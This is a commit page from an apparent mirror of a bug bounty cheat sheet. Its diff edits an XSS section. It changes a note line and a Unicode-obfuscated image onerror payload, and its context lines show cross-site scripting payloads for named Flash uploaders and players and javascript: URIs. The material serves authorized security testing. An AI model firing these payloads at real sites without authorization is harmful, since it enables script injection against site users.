Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2025-02-16 14:38:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

[XSS] amend Unicode payload, add Flash SWF

Browse source
This commit is contained in:
Yasin Soliman 2017-10-18 16:50:27 +01:00 committed by GitHub
parent 469dda90e9
commit 39f4ab3437
1 changed files with 4 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
cheatsheets/xss.md
View file

@ -147,9 +147,11 @@ javas	cript://www.google.com/%0Aalert(1)
- SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
- Uploadify (legacy): `uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf`
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
_Note: Useful reference on constructing Flash-based XSS payloads available at [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
**Lightweight Markup Languages**
@ -176,7 +178,7 @@ __ javascript:alert(document.domain)
**Unicode characters**
```html
†‡•img src=a onerror=javascript:alert('hacked')>…‰€
†‡•img src=a onerror=javascript:alert('test')>…‰€
```
**AngularJS Template Injection based XSS**